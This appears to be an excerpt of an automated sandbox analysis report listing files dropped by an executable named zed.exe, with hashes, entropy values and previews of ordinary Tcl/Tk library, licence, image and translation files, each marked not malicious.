                                                                                                                                                                                                                                            Preview:GIF89a0.K.............................f.................f...ff.f3.f..33.3.........f..ff.f3.3f.33.3.f..ff.ff.f3ff333f.3f.33.33f.3......................................................................!.. -dl-.!.......,....0.K....@.pH,...GD.<:..%SR.Z......<.V.$l.....z......:.. .|v[D..f...z.W.G.Vr...NgsU.yl..qU..`.......`fe`.......Fg....(.&...g.Y.. .."..q.V.$.'.Ez.W....y...Y.U...(#Xrf.........Xux.U..........(U.4...X....G.B..t..1S...R..Y. ...l ..".>.h......,%K....A.....<s....#..8.iK.....a.y$h..DQh.PE)....6.....MyL.qzF..... ."..Y0..a......2..*t..Ma..b...M..R.....\..st..=....Q......,>s`....Qt.,..B.R.....!.$..%.....(...s...B.T...`,".h(. D....8..dC..\Q.p.......x.#A.....:..du..(D.XV......7....S.#n8a....2`...f.:G,...==(......`!..$...t....b..../N|...f..J.x... P&.|.d._!N...].1w.3D.0!....@o&H...N.B.J....pz8..w.i....=r.............@5.-!.......H."..[.j.AB<..p....h...V.D..6.h...ab1F.g...I !.V~.H..V.........:.G..|c...,.....TD5..c[.W.....LC.....FJ..71[..lH.M.....8.:$......
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 100 x 100
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5473
                                                                                                                                                                                                                                            Entropy (8bit):7.754239979431754
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:+EqG96vSGfyJZ26G6U1LI7nTD2enhjc+2VBnOqcUERVIim:+46KcyJI6G6uU7/LhjlkhQR7m
                                                                                                                                                                                                                                            MD5:048AFE69735F6974D2CA7384B879820C
                                                                                                                                                                                                                                            SHA1:267A9520C4390221DCE50177E789A4EBD590F484
                                                                                                                                                                                                                                            SHA-256:E538F8F4934CA6E1CE29416D292171F28E67DA6C72ED9D236BA42F37445EA41E
                                                                                                                                                                                                                                            SHA-512:201DA67A52DADA3AE7C533DE49D3C08A9465F7AA12317A0AE90A8C9C04AA69A85EC00AF2D0069023CD255DDA8768977C03C73516E4848376250E8D0D53D232CB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:GIF89ad.d...................RJJ...B99.......RBB..B11ZBB!....R991!!...)....{{B!!R)).JJ.ss.ZZ.BB.kk.RR.JJ.BB9...JJR!!.ZZ.BB.11.99.{s.sk.kc.cZ.ZR.JB.ZR.JB.JB.RJ.B9.91.B9...{.JB.91.B9.B9.1){)!.)!.9)..ZR.JB{91.cR{1).ZJ.ZJ.RB.J9.B1.B1.9).1!....{B9.{k.scc1).kZZ)!c)!.9).B1.9).9).1!.1!.1!.B).9!.9!.1..).....{.sZ1)R)!.B1.B1.ZBR!..9).ZB.9).R9.R9.1!.J1.J1.B).B).9!.9!.1..1..).....sZ.J9.ZB.cJJ!.{1!.B).9!{)..9!.J).B!.B!.9..R1).kJ)!.B1{9).R9.cB.Z9.Z9.B).Z9.B).R1.9!.R1.J).J).B!.1..9....{.s.J9.{Z.ZB.sR.kJk1!.cB.cB.R1.R).1..B!.J!.B.....R91.J1).c.kJ.J).Z1.B!.B!..9!..{R.sJ.Z9.R1{9!..s.R9.Z...J91Z9){B)...............B91..1)!..............................RJR............B)1......R19........BJ.9B..{..s{......!.......,....d.d.@............0@PHa....*.p...7.8.y...C.s6Z.%Q.#s.`:B.N....4jd.K.0..|y....F@.......1~ ......'Y.B"C&R.V.R.4$k.3...D.......Ef*Y3..M........BDV._.....\..).]..>s..$H\%y0WL...d.......D..'..v..1Kz.Zp$;S
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2307
                                                                                                                                                                                                                                            Entropy (8bit):5.135743409565932
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:XU/zAcKT6yOCaDBfsHLk32s3J5w83KDyP1BXy3JQz7yuC:XNc+92sg3A8uyDXy3JQnDC
                                                                                                                                                                                                                                            MD5:F090D9B312C16489289FD39813412164
                                                                                                                                                                                                                                            SHA1:1BEC6668F6549771DADC67D153B89B8F77DCD4B9
                                                                                                                                                                                                                                            SHA-256:0D1E4405F6273F091732764ED89B57066BE63CE64869BE6C71EA337DC4F2F9B5
                                                                                                                                                                                                                                            SHA-512:57B323589C5A8D9CBB224416731D8CE65C4B94146DF15CE30885DF63B1D0B3F709093B65390A911F84F20B7C5DE3C0AF9B4D7D531742BE046EDA6E8C3432EF6E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:This software is copyrighted by the Regents of the University of..California, Sun Microsystems, Inc., Scriptics Corporation, ActiveState..Corporation, Apple Inc. and other parties. The following terms apply to..all files associated with the software unless explicitly disclaimed in..individual files.....The authors hereby grant permission to use, copy, modify, distribute,..and license this software and its documentation for any purpose, provided..that existing copyright notices are retained in all copies and that this..notice is included verbatim in any distributions. No written agreement,..license, or royalty fee is required for any of the authorized uses...Modifications to this software may be copyrighted by their authors..and need not follow the licensing terms described here, provided that..the new terms are clearly indicated on the first page of each file where..they apply.....IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY..FOR DIRECT, INDIRECT, SPECIAL, INCI
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15255
                                                                                                                                                                                                                                            Entropy (8bit):4.9510475386072095
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:apDYV5Yupn5OcckwBv3HCpg2J8JvJBfWeZhXkz+WkHGowv:aPPkevB2JuvJ9D3XmSc
                                                                                                                                                                                                                                            MD5:804E6DCE549B2E541986C0CE9E75E2D1
                                                                                                                                                                                                                                            SHA1:C44EE09421F127CF7F4070A9508F22709D06D043
                                                                                                                                                                                                                                            SHA-256:47C75F9F8348BF8F2C086C57B97B73741218100CA38D10B8ABDF2051C95B9801
                                                                                                                                                                                                                                            SHA-512:029426C4F659848772E6BB1D8182EB03D2B43ADF68FCFCC1EA1C2CC7C883685DEDA3FFFDA7E071912B9BDA616AD7AF2E1CB48CE359700C1A22E1E53E81CAE34B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# listbox.tcl --..#..# This file defines the default bindings for Tk listbox widgets..# and provides procedures that help in implementing those bindings...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994-1995 Sun Microsystems, Inc...# Copyright (c) 1998 by Scriptics Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....#--------------------------------------------------------------------------..# tk::Priv elements used in this file:..#..# afterId -..Token returned by "after" for autoscanning...# listboxPrev -.The last element to be selected or deselected..#...during a selection operation...# listboxSelection -.All of the items that were selected before the..#...current selection operation (such as a mouse..#...drag) started; used to cancel an operation...#--------------------------------------------------------------------------....#--------------
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9862
                                                                                                                                                                                                                                            Entropy (8bit):4.786615174847384
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:mvEEVwjVwqOpOLbkVAg/vyKEZ25YbKZbwrmQ:mvEEVwJwpALPgnyx25YGZkr3
                                                                                                                                                                                                                                            MD5:D83ED6AC2912900040530528A0237AB3
                                                                                                                                                                                                                                            SHA1:2D18E42A8B96C3D71C1C6701010FDF75C1E6D5D8
                                                                                                                                                                                                                                            SHA-256:848258B946C002E2696CA3815A1589C8120AF5CC41FBC11BBD9A3F5754CC21AF
                                                                                                                                                                                                                                            SHA-512:00B4CD0D58029FC37820C163A4AE1DEAD22FB5C767BDC118659EACE26D449C362189611DFB3FAB1AC129FABFEC2CE853EA2C10D418FAE5AEB91DDC9330FF782D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# megawidget.tcl..#..#.Basic megawidget support classes. Experimental for any use other than..#.the ::tk::IconList megawdget, which is itself only designed for use in..#.the Unix file dialogs...#..# Copyright (c) 2009-2010 Donal K. Fellows..#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#....package require Tk.....::oo::class create ::tk::Megawidget {.. superclass ::oo::class.. method unknown {w args} {...if {[string match .* $w]} {... [self] create $w {*}$args... return $w...}...next $w {*}$args.. }.. unexport new unknown.. self method create {name superclasses body} {...next $name [list \....superclass ::tk::MegawidgetClass {*}$superclasses]\;$body.. }..}....::oo::class create ::tk::MegawidgetClass {.. variable w hull options IdleCallbacks.. constructor args {...# Extract the "widget name" from the object name...set w [namespace tail [self]].....# Configure things...
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):39790
                                                                                                                                                                                                                                            Entropy (8bit):4.915612301723047
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:NKJsO8O4IzOQjJwxzire5pKVjriecYyq4CpKgnP:NKJsO8iOQizire54lriecYf40
                                                                                                                                                                                                                                            MD5:B7DAA21C1C192B8CB5B86CBD7B2CE068
                                                                                                                                                                                                                                            SHA1:AE8ABF9017F37CCDF5D0D15DE66BB124A7482BA0
                                                                                                                                                                                                                                            SHA-256:312AF944A276CDBF1EE00757EF141595670984F7F13E19922C25643A040F5339
                                                                                                                                                                                                                                            SHA-512:B619E3B8BE5EC4545E97B7A7A7F7FECC2AAFA58438F9CA3819F644720CF5FF5C44DA12AC25988570E595D97CAD799F87D93C24D5E67A7A953B9F5312952FBEB6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# menu.tcl --..#..# This file defines the default bindings for Tk menus and menubuttons...# It also implements keyboard traversal of menus and implements a few..# other utility procedures related to menus...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...# Copyright (c) 1998-1999 Scriptics Corporation...# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# Elements of tk::Priv that are used in this file:..#..# cursor -..Saves the -cursor option for the posted menubutton...# focus -..Saves the focus during a menu selection operation...#...Focus gets restored here when the menu is unposted...# grabGlobal -..Used in conjunction with tk::Priv(oldGrab): if..#...tk::Priv(oldGrab) is non
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):30840
                                                                                                                                                                                                                                            Entropy (8bit):5.142909056222569
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:+c4g8rSnBGzHsGK83Ch0x/0kmSq6O4+rNfPCpM2sEmqKys3pCJxi5dEaY:+c4g8OnBGzBK83Ch0x/0FSq6OnrGM2h3
                                                                                                                                                                                                                                            MD5:983C7B78F1A0EBACAB8006D391A01FCD
                                                                                                                                                                                                                                            SHA1:7EA37474EA039ED7A37BFDD7D76EAE673E666283
                                                                                                                                                                                                                                            SHA-256:C5BDCA3ABA671F03DC4624AB5FD260490F5002491D6C619142CCF5A1A744528A
                                                                                                                                                                                                                                            SHA-512:A006EF9B7213E572F6FC540D1512A52C52FEC44E3A07846DE09662AE32B7191C5CF639798531847B39E4076BF9DD6314B6F5373065C04F4FEF221185B39C3117
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# mkpsenc.tcl --..#..# This file generates the postscript prolog used by Tk.....namespace eval ::tk {.. # Creates Postscript encoding vector for ISO-8859-1 (could theoretically.. # handle any 8-bit encoding, but Tk never generates characters outside.. # ASCII)... #.. proc CreatePostscriptEncoding {} {...variable psglyphs...# Now check for known. Even if it is known, it can be other than we...# need. GhostScript seems to be happy with such approach...set result "\[\n"...for {set i 0} {$i<256} {incr i 8} {... for {set j 0} {$j<8} {incr j} {....set enc [encoding convertfrom "iso8859-1" \.....[format %c [expr {$i+$j}]]]....catch {.... set hexcode {}.... set hexcode [format %04X [scan $enc %c]]....}....if {[info exists psglyphs($hexcode)]} {.... append result "/$psglyphs($hexcode)"....} else {.... append result "/space"....}... }... append result "\n"...}...append result "\]"...return $result.. }.... # List of adobe glyph names. Converted from glyph
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:xbm image (32x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):16786
                                                                                                                                                                                                                                            Entropy (8bit):4.717927930017041
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:+haZOxBpK8uxGe4V88/wxY3Fxqipz4zz4zxxFzxT4OcErDxqdRRZeuC/Vj2CoopC:+hRWRG3FFjvsfCoopwITHzLHFHHAABs
                                                                                                                                                                                                                                            MD5:217087AB6B2A8F9D7252E311D69C3769
                                                                                                                                                                                                                                            SHA1:09AEB2BC5B7C7F4AB3DE4211D786C519AE0970F6
                                                                                                                                                                                                                                            SHA-256:A07E3A3809CED3C6C9C1E171DCA5AD1F28357734CD41B2B9DD9F58085B3D2842
                                                                                                                                                                                                                                            SHA-512:6E57633C924BFC16D380C014C20DD24D5727E70D4843FCEC4D7995B4DB21941EA8F2A5FD6E5386DF3364B6905D4D66B2B9595DC8FC70CFF40A2D49A92A1B6FBA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# msgbox.tcl --..#..#.Implements messageboxes for platforms that do not have native..#.messagebox support...#..# Copyright (c) 1994-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# Ensure existence of ::tk::dialog namespace..#..namespace eval ::tk::dialog {}....image create bitmap ::tk::dialog::b1 -foreground black \..-data "#define b1_width 32\n#define b1_height 32..static unsigned char q1_bits[] = {.. 0x00, 0xf8, 0x1f, 0x00, 0x00, 0x07, 0xe0, 0x00, 0xc0, 0x00, 0x00, 0x03,.. 0x20, 0x00, 0x00, 0x04, 0x10, 0x00, 0x00, 0x08, 0x08, 0x00, 0x00, 0x10,.. 0x04, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00, 0x40, 0x02, 0x00, 0x00, 0x40,.. 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80,.. 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80,.. 0x01, 0x00, 0x00, 0x80, 0x02, 0x00, 0x00, 0x40, 0x02, 0x00, 0x00, 0x40,.. 0x04, 0x00,
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4235
                                                                                                                                                                                                                                            Entropy (8bit):4.789130604359491
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nlw9Twd+j3gLhokqwX+hTnJgNanPNcgRhgP+5QPwJJENL:nlw9TjjwI3hTnJgNaRhgP75L
                                                                                                                                                                                                                                            MD5:5A8B46B85DCCBF74E2B5B820E1A7B9D1
                                                                                                                                                                                                                                            SHA1:980F4FC5BABA82BA0FE02F9BD03A23DF6D565BB1
                                                                                                                                                                                                                                            SHA-256:4DFFBEEDBF0D66D84B13088016D1A782CEAAD4DED27BE1E38842F8969C0E533F
                                                                                                                                                                                                                                            SHA-512:2D81FC06CF3C20E4F6314BD13AF81FDE38A9B06510584C84C6A0C8C36314F980F77D02BD8056E7EE5DE599A0620E0C0349124147334B9C141145270046B19D90
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset cs "&Abort" "&P\u0159eru\u0161it".. ::msgcat::mcset cs "&About..." "&O programu...".. ::msgcat::mcset cs "All Files" "V\u0161echny soubory".. ::msgcat::mcset cs "Application Error" "Chyba programu".. ::msgcat::mcset cs "Bold Italic".. ::msgcat::mcset cs "&Blue" "&Modr\341".. ::msgcat::mcset cs "Cancel" "Zru\u0161it".. ::msgcat::mcset cs "&Cancel" "&Zru\u0161it".. ::msgcat::mcset cs "Cannot change to the directory \"%1\$s\".\nPermission denied." "Nemohu zm\u011bnit atku\341ln\355 adres\341\u0159 na \"%1\$s\".\nP\u0159\355stup odm\355tnut.".. ::msgcat::mcset cs "Choose Directory" "V\375b\u011br adres\341\u0159e".. ::msgcat::mcset cs "Cl&ear" "Sma&zat".. ::msgcat::mcset cs "&Clear Console" "&Smazat konzolu".. ::msgcat::mcset cs "Color" "Barva".. ::msgcat::mcset cs "Console" "Konzole".. ::msgcat::mcset cs "&Copy" "&Kop\355rovat".. ::msgcat::mcset cs "Cu&t" "V&y\u0159\355znout".. ::msgcat::mcset cs "&
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3987
                                                                                                                                                                                                                                            Entropy (8bit):4.651948695787255
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nRZ2uDMr05sIEzs2KkrT+XuTKN0FjDDP9:nRZzDy4kBKkrT+QpP9
                                                                                                                                                                                                                                            MD5:227B0F255F854460E8E5146ED7A17B85
                                                                                                                                                                                                                                            SHA1:99A080CAD631F21963C51A5B254BDAD3724DC866
                                                                                                                                                                                                                                            SHA-256:FEEF8F8AD33BB3362C845A25D6ED273C398051047D899B31790474614C7AFD2D
                                                                                                                                                                                                                                            SHA-512:36A4B48831316CC29686CC76DA00110EB078EC56F55A960D11AE427AA3D913C340C1E3805BF2AD40C1A8A92FC6587DA5D2C245E7501289FC3E228BE14FE49598
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset da "&Abort" "&Afbryd".. ::msgcat::mcset da "&About..." "&Om...".. ::msgcat::mcset da "All Files" "Alle filer".. ::msgcat::mcset da "Application Error" "Programfejl".. ::msgcat::mcset da "&Blue" "&Bl\u00E5".. ::msgcat::mcset da "Cancel" "Annuller".. ::msgcat::mcset da "&Cancel" "&Annuller".. ::msgcat::mcset da "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan ikke skifte til katalog \"%1\$s\".\nIngen rettigheder.".. ::msgcat::mcset da "Choose Directory" "V\u00E6lg katalog".. ::msgcat::mcset da "Cl&ear" "&Ryd".. ::msgcat::mcset da "&Clear Console" "&Ryd konsolen".. ::msgcat::mcset da "Color" "Farve".. ::msgcat::mcset da "Console" "Konsol".. ::msgcat::mcset da "&Copy" "&Kopier".. ::msgcat::mcset da "Cu&t" "Kli&p".. ::msgcat::mcset da "&Delete" "&Slet".. ::msgcat::mcset da "Details >>" "Detailer".. ::msgcat::mcset da "Directory \"%1\$s\" does not exist." "Katalog \"%1\$s\" finde
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4914
                                                                                                                                                                                                                                            Entropy (8bit):4.6221938909259475
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:nxLEpatioUqGBLbz4ME/XKKVN9R7S/0oYr9:epY3MkXKKxRu2r9
                                                                                                                                                                                                                                            MD5:2203F65BCDA61BC15AEAC4F868C6D94A
                                                                                                                                                                                                                                            SHA1:C4CC3975679D23892406E4E8971359A0775B1B86
                                                                                                                                                                                                                                            SHA-256:C0F574B14068A049E93421C73873D750C98DE28B7B77AA42FE72CBE0270A4186
                                                                                                                                                                                                                                            SHA-512:79F134FDAD3B12524D43BF9F59D3C04CAE30A95F591A51B82C8DF7CC8563BEA5D464AEECC457D9F60C04365E30459C447ED537AFC832BA25E1815DE06C2B81E5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset de "&Abort" "&Abbruch".. ::msgcat::mcset de "&About..." "&\u00dcber...".. ::msgcat::mcset de "All Files" "Alle Dateien".. ::msgcat::mcset de "Application Error" "Applikationsfehler".. ::msgcat::mcset de "&Apply" "&Anwenden".. ::msgcat::mcset de "Bold" "Fett".. ::msgcat::mcset de "Bold Italic" "Fett kursiv".. ::msgcat::mcset de "&Blue" "&Blau".. ::msgcat::mcset de "Cancel" "Abbruch".. ::msgcat::mcset de "&Cancel" "&Abbruch".. ::msgcat::mcset de "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kann nicht in das Verzeichnis \"%1\$s\" wechseln.\nKeine Rechte vorhanden.".. ::msgcat::mcset de "Choose Directory" "W\u00e4hle Verzeichnis".. ::msgcat::mcset de "Cl&ear" "&R\u00fccksetzen".. ::msgcat::mcset de "&Clear Console" "&Konsole l\u00f6schen".. ::msgcat::mcset de "Color" "Farbe".. ::msgcat::mcset de "Console" "Konsole".. ::msgcat::mcset de "&Copy" "&Kopieren".. ::msgcat::mcset de "
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (355), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8784
                                                                                                                                                                                                                                            Entropy (8bit):4.334043617395095
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:tVj/F+oxBHbkI8+xTqFt2zPJ0k63fRGIUvPXrfBNnzc+zIF7meUOT7GC8MO07S0g:fj9+AHlLoozHn7fBFrMVmehCAGb
                                                                                                                                                                                                                                            MD5:780F863903BBDAA6C371EC0D3C7E6D59
                                                                                                                                                                                                                                            SHA1:DF5D435E132BEE4C076A7FC577C8C275A8B68CD5
                                                                                                                                                                                                                                            SHA-256:3F6F155864FE59A341BFD869735E54DD21CEE21BBD038433D9B271AD77BA3F7E
                                                                                                                                                                                                                                            SHA-512:091965EE912513AE1943BE840A2E757188FBA6F760F7C47BE80D06313D59B051F183E3A29D4B1CEDE1F9E54CA3CA23D75FF2C3A3672A4E71FB56F0FA76F7FA0D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:## Messages for the Greek (Hellenic - "el") language...## Please report any changes/suggestions to:..## petasis@iit.demokritos.gr....namespace eval ::tk {.. ::msgcat::mcset el "&Abort" "\u03a4\u03b5\u03c1\u03bc\u03b1\u03c4\u03b9\u03c3\u03bc\u03cc\u03c2".. ::msgcat::mcset el "About..." "\u03a3\u03c7\u03b5\u03c4\u03b9\u03ba\u03ac...".. ::msgcat::mcset el "All Files" "\u038c\u03bb\u03b1 \u03c4\u03b1 \u0391\u03c1\u03c7\u03b5\u03af\u03b1".. ::msgcat::mcset el "Application Error" "\u039b\u03ac\u03b8\u03bf\u03c2 \u0395\u03c6\u03b1\u03c1\u03bc\u03bf\u03b3\u03ae\u03c2".. ::msgcat::mcset el "&Blue" "\u039c\u03c0\u03bb\u03b5".. ::msgcat::mcset el "&Cancel" "\u0391\u03ba\u03cd\u03c1\u03c9\u03c3\u03b7".. ::msgcat::mcset el \.."Cannot change to the directory \"%1\$s\".\nPermission denied." \.."\u0394\u03b5\u03bd \u03b5\u03af\u03bd\u03b1\u03b9 \u03b4\u03c5\u03bd\u03b1\u03c4\u03ae \u03b7 \u03b1\u03bb\u03bb\u03b1\u03b3\u
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3377
                                                                                                                                                                                                                                            Entropy (8bit):4.279601088621442
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:sQ7dw5bO0V3gqmCNyoKJ6iwp/uvENv4SKEcET2hsHFjr:n7dwNOc3RmOKJQcvEl4SK1ET2hYFjr
                                                                                                                                                                                                                                            MD5:D48CFC9EC779085E8F6AAA7B1C40C89A
                                                                                                                                                                                                                                            SHA1:0CF6253BFF39F40CA0991F9B06D3394BFEA21ED2
                                                                                                                                                                                                                                            SHA-256:4A33B44B2E220E28EAAE7FAC407CAFE43D97C270DA58FA5F3B699A1760BFB2A4
                                                                                                                                                                                                                                            SHA-512:C00EC0CFB48ABE621EF625C51952BCF177CE3BC7F0DEC5276EF84C9A97C7E014806B106EA8DEE202C43F8DD54ED7261A8D899E3EE12E3F37A90C387D864463AE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset en "&Abort".. ::msgcat::mcset en "&About...".. ::msgcat::mcset en "All Files".. ::msgcat::mcset en "Application Error".. ::msgcat::mcset en "&Apply".. ::msgcat::mcset en "Bold".. ::msgcat::mcset en "Bold Italic".. ::msgcat::mcset en "&Blue".. ::msgcat::mcset en "Cancel".. ::msgcat::mcset en "&Cancel".. ::msgcat::mcset en "Cannot change to the directory \"%1\$s\".\nPermission denied.".. ::msgcat::mcset en "Choose Directory".. ::msgcat::mcset en "Cl&ear".. ::msgcat::mcset en "&Clear Console".. ::msgcat::mcset en "Color".. ::msgcat::mcset en "Console".. ::msgcat::mcset en "&Copy".. ::msgcat::mcset en "Cu&t".. ::msgcat::mcset en "&Delete".. ::msgcat::mcset en "Details >>".. ::msgcat::mcset en "Directory \"%1\$s\" does not exist.".. ::msgcat::mcset en "&Directory:".. ::msgcat::mcset en "&Edit".. ::msgcat::mcset en "Effects".. ::msgcat::mcset en "Error: %1\$s".. ::msgcat::mcs
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                                            Entropy (8bit):4.262228832346611
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:fEGp6fRyv//mGoW8vMKEQXyVn:sooyv//xoQOOn
                                                                                                                                                                                                                                            MD5:3D41FC47CD9936F817EF9645D73A77ED
                                                                                                                                                                                                                                            SHA1:E62BBE094B71CAF4A389DE3ECD84D2EEFBA33827
                                                                                                                                                                                                                                            SHA-256:01238293356E82F1D298896491F8B299BB7DC9C34F299C9E756254C736DA612B
                                                                                                                                                                                                                                            SHA-512:B92582C32C4D7CD9DE6571CBB6B93DD693A8B5A80645468E2D02B80C339BE2B95D5B4878A0DA9AFFE9E2F98A6C38AAE9CC1FF2440146D0ED128FE8C9A92EECDB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset en_gb Color Colour..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4035
                                                                                                                                                                                                                                            Entropy (8bit):4.614759526381991
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:n6oXunu4/LQmI+nl0WemQ+uISIKk/2nibN5My/uXcFSZHBohy:n6oXuu4jJtlPemVuISIKkuniJS1Gy
                                                                                                                                                                                                                                            MD5:3704A08985B0AA3C521FDF9C2DA59D97
                                                                                                                                                                                                                                            SHA1:3F1E42C5697504B4DEE1EE314CD361B4203BF686
                                                                                                                                                                                                                                            SHA-256:84B117857674A2426290946053A61316C5C8C6808F2C6EDF0ECC5C4A9C5C72AC
                                                                                                                                                                                                                                            SHA-512:99FE97B10B1CA59DDA0385161E7C05F7D22424B6B1FB844138921EF94B2E9809D73EBC0062897D0DDE040CF92C96A6E4916CC9F3F02442AE2C4162858434B6BA
                                                                                                                                                                                                                                            Malicious:false
